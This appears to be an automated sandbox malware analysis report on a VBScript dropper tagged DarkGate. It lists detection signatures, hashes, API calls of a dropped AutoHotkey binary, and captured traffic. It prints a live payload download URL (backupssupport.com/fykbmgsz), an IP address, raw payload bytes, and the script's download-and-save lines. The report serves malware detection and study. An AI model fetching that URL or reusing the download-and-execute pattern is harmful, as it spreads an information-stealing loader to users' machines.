Windows Analysis Report
ndvdikok.vbs

Overview

General Information

Sample name: ndvdikok.vbs
Analysis ID: 1427163
MD5: 32f61baa669991fb989439babaf493ff
SHA1: 4242d545077e3e643854e3148e00c8283533b9ab
SHA256: 75db6f949461cb03a155dd26c781a3c9e00edb917275f3b4d306b7094ed06a14
Tags: DarkGatevbs
Infos:

Detection

DarkGate, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Yara detected MailPassView
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Potential malicious VBS script found (has network functionality)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
DarkGate First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: ndvdikok.vbs Virustotal: Detection: 15% Perma Link
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose, 1_2_00480DC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0045E220
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle, 1_2_0047C320
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose, 1_2_0044D570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime, 1_2_0044D870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose, 1_2_00437B70
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0044DBB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW, 1_2_00480D30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose, 1_2_0045EEA0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048495A1 FindFirstFileA,GetLastError, 1_2_048495A1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose, 1_2_0489C541
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_0484655D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 1_2_0489B145
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose, 1_2_04876FE5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose, 1_2_04873871

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80 Jump to behavior
Potential malicious VBS script found (has network functionality)
Source: Initial file: stream.Write xmlhttp.ResponseBody
Source: Initial file: stream.SaveToFile zipFile, 2
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERCENTRALUS SERVERCENTRALUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fykbmgsz HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backupssupport.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045DB90 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW, 1_2_0045DB90
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: closeContent-Disposition: attachment; filename="fykbmgsz"Content-Type: application/octet-streamContent-Length: 795674Date: Wed, 17 Apr 2024 04:39:55 GMTData Raw: 50 4b 03 04 14 00 00 00 08 00 47 2f 90 58 5b 96 81 81 59 ef 04 00 62 8a 0e 00 08 00 00 00 74 65 73 74 2e 74 78 74 ec dd 57 82 dc 38 d2 36 ea 2d a5 37 97 69 f7 bf a4 ff 79 03 00 93 64 55 69 ba 5b fa 6e ce 11 67 5a 95 34 70 81 f0 08 04 ae 9b d7 f5 7e dd ec 37 75 1d f7 e7 c3 e9 75 3a 9c 77 87 ed e9 78 dc 9d 4e 87 cb e9 76 da 9d cf c7 eb e9 7c 7a 1d de a7 f7 f9 7a da 1f ee 87 dd f1 76 dc 1d ee be d9 1f 5d e7 db e9 78 be 1c 6e 7e 1e 0e c7 e3 e6 b0 3b 9c cf a7 f3 e5 f4 3e 5d 0e 8f f3 e1 f0 38 6e fd 7e 9d 77 c7 fd e9 7a be 1d 8e e7 cd 69 ef 8b 83 ef b6 fe d9 1e 8f a7 f3 f9 a6 d6 f3 49 0b 6a 79 7b 73 3b f8 52 5d 97 f3 f9 f0 54 ff eb bc 3f ec ce 1b ff 1e 4e 5b ad 9c 8f 97 e3 e9 f0 f6 46 dd a7 e7 e9 a8 c7 c7 d3 d6 3f bb e3 f6 7c 3d e6 7f db 73 be b8 2a 77 3e 6f 34 b2 d5 c6 e1 f0 3a ec 4e 8f d3 f1 b0 37 c2 a7 2f d3 a3 83 5f 19 d5 f6 b0 3f 3d b5 fc 36 a6 ab 77 e7 c3 f9 74 3b fa ce 38 33 d8 8b 3a ae fa e2 d6 7f 5e d6 97 27 6d 5c b5 bf 3b 5d 3d d3 83 f3 4e 6d 5b ed ee 4e 97 7c 0f 76 e0 73 78 6a 0b fc f4 f6 0d 26 7a a3 0f cf d3 e3 bc 37 f2 fd e1 71 7a 1f 4e a7 8b 96 b7 81 b6 fe 6e d4 7b 3c bd 34 b6 3f de 40 ed 7e 3a 1c ee 46 6b 16 8e 1b d0 bd 83 77 5a 3d 98 99 9d 91 f9 e1 e9 13 fc 2e 6a 07 22 b3 ba 35 19 ef c3 2d 6d 1a cc e6 f0 30 49 fb b3 06 f5 e0 60 66 77 a7 bb 9a 5f 7a 0e aa a7 cb 79 7f ba 99 9b bd 12 67 90 ba 64 56 40 52 1b d5 eb 93 39 7c 7b 72 3b 5c cf 7b 50 3d e8 6d 00 b3 3d 99 f5 63 5a d9 a9 65 7b 7a 80 d1 01 1c 55 a2 d7 b0 c2 28 dd 9b 85 73 da cd ec e8 d9 cd bb 07 18 1a 51 f5 e5 76 3a a9 67 0b ca d7 93 59 53 ea 06 03 9e c7 3d 58 04 1f 1f a0 70 32 73 77 f0 79 18 b7 59 02 6b 68 62 5c cf 63 46 73 04 ed 07 bc bd 9b b1 dd c9 d8 33 02 35 de c0 34 3d ba 1e f6 66 62 a3 67 70 1d b6 99 e3 60 a0 d9 3f fb ef 62 16 6f e6 ec ae ce bd d1 6b d4 17 17 6d 2a ea a9 1f ea 85 15 c1 06 94 f2 76 77 86 4b fa 95 b9 86 ab f0 c0 f8 bc 07 89 bd 12 57 7d cd dc 1c f5 ca 1d 38 1f 03 25 75 9a d8 d3 3d 7d 05 37 d0 33 96 bd 71 6f 8c e1 72 b8 a0 41 14 a5 b7 3e 52 5b cd d1 11 36 a4 9f 07 a3 82 5f 27 33 a9 ee 33 04 f0 df 43 af 6e 85 05 70 d7 9c 9d 82 6b 6a f3 ce ac 67 8a 36 46 7c d5 ca 3b 33 a4 b4 17 7a fd ce dc 86 32 43 51 60 fe 38 83 6e e6 52 cd d7 70 80 cc a6 de 18 97 f7 f7 c3 bd f8 c3 53 79 50 28 2a ce 9c 43 cb 20 94 3a 02 af e0 b0 ba 35 7c 41 51 ef 43 e8 f9 84 83 dc 71 12 f8 a2 b6 bb 96 15 68 b3 ab 5e a3 3a df 42 05 30 69 03 33 e0 77 b8 0d 6a 3c 99 cf 8b 52 af d4 8f 56 3c 29 1e 84 9a 60 56 6a 7e 80 85 fe ab f5 04 ef 40 0c ec ef 50 01 a6 64 9e b5 b5 87 75 a1 42 68 17 2c 30 b2 d0 0a 8a 0a f4 c0 1a ef f0 dd de 2c bc 60 4c 66 d8 4c 64 ca 81 2d df 81 b7 6f 2f b0 0c a0 e1 fb 49 79 9c 06 3e 6d 8a 77 e9 ab 59 0b be bc c1 2b 13 bb 33 af 46 a9 c5 5b 28 0b a6 ee 7c a1 f6 1a 5f 28 46 33 b0 cd 07 fe 87 bf 99 11 dc cc 13 d8 a9 e4 0e dc 0e fe 85 73 6a 3d e8 a1 5a 8f ba e9 ab 83 36 f0 9a f0 02 fc 29 bc
Source: global traffic HTTP traffic detected: GET /fykbmgsz HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backupssupport.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: backupssupport.com
Source: wscript.exe, 00000000.00000002.1660300685.000001D5A3ECA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658115436.000001D5A5B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp, ndvdikok.vbs String found in binary or memory: http://backupssupport.com/fykbmgsz
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://backupssupport.com/fykbmgsz6
Source: wscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://backupssupport.com/fykbmgszj
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr String found in binary or memory: https://autohotkey.com
Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr String found in binary or memory: https://autohotkey.comCould
Source: wscript.exe, 00000000.00000002.1660535194.000001D5A5EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040E820 SetWindowsHookExW 0000000D,Function_00009EA0,00400000,00000000 1_2_0040E820
Contains functionality for read data from the clipboard
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405430 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard, 1_2_00405430
Contains functionality to modify clipboard data
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard, 1_2_00405160
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00483160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard, 1_2_00483160
Contains functionality to read the clipboard data
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405330 GetClipboardFormatNameW,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData, 1_2_00405330
Contains functionality to record screenshots
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free, 1_2_004442E0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00416010 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount, 1_2_00416010
Potential key logger detected (key state polling based)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004014E4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW, 1_2_004014E4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00418140 GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyState, 1_2_00418140
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00414870 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId, 1_2_00414870
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0487357D CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 1_2_0487357D

System Summary
barindex
Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\NwiQ\AutoHotkey.exe Window found: window name: AutoHotkey Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Contains functionality to call native functions
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04895009 Sleep,TerminateThread,NtClose,NtClose, 1_2_04895009
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894C89 NtDuplicateObject,NtClose, 1_2_04894C89
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894CBD NtQueryObject,NtQueryObject, 1_2_04894CBD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894D15 NtOpenProcess, 1_2_04894D15
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894D65 NtQuerySystemInformation,NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose, 1_2_04894D65
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A8DD GetCurrentProcessId,OpenProcess,InitializeProcThreadAttributeList,GetProcessHeap,RtlAllocateHeap,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 1_2_0486A8DD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486ABFD GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 1_2_0486ABFD
Contains functionality to communicate with device drivers
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00449B70: __swprintf,CreateFileW,DeviceIoControl,CloseHandle, 1_2_00449B70
Contains functionality to shutdown / reboot the system
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045F410
Detected potential crypto function
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004014E4 1_2_004014E4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004517E0 1_2_004517E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004260F0 1_2_004260F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0042A3C0 1_2_0042A3C0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040D3F0 1_2_0040D3F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A23BC 1_2_004A23BC
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A654C 1_2_004A654C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00411570 1_2_00411570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0048E630 1_2_0048E630
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040D6C0 1_2_0040D6C0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A1865 1_2_004A1865
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00414870 1_2_00414870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041F800 1_2_0041F800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00429800 1_2_00429800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047F800 1_2_0047F800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00443AD0 1_2_00443AD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A6A9D 1_2_004A6A9D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00423B30 1_2_00423B30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00438B30 1_2_00438B30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A7BE9 1_2_004A7BE9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00411BB0 1_2_00411BB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049CBB8 1_2_0049CBB8
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A9CDE 1_2_004A9CDE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00419E61 1_2_00419E61
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00412E60 1_2_00412E60
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00419E60 1_2_00419E60
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00401EF4 1_2_00401EF4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004260F0 1_2_004260F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043BFE0 1_2_0043BFE0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0488E009 1_2_0488E009
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04866251 1_2_04866251
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0488CA21 1_2_0488CA21
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04881A51 1_2_04881A51
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048AD826 1_2_048AD826
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\NwiQ\AutoHotkey.exe 897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
Found potential string decryption / allocating functions
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04875E39 appears 33 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00480050 appears 42 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04845251 appears 76 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0043A140 appears 78 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00409044 appears 36 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0047FFB0 appears 67 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0049A3AA appears 60 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0484520D appears 34 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 048454ED appears 97 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0049A90E appears 35 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04844F7D appears 101 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0043A420 appears 283 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00499C29 appears 342 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04847581 appears 77 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 004A7DD0 appears 51 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: ndvdikok.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@3/7@1/1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 1_2_0043B100
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045F410
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00449810 _wcsncpy,GetDiskFreeSpaceExW, 1_2_00449810
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045F620 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle, 1_2_0045F620
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0045E220
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00481EC0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW, 1_2_00481EC0
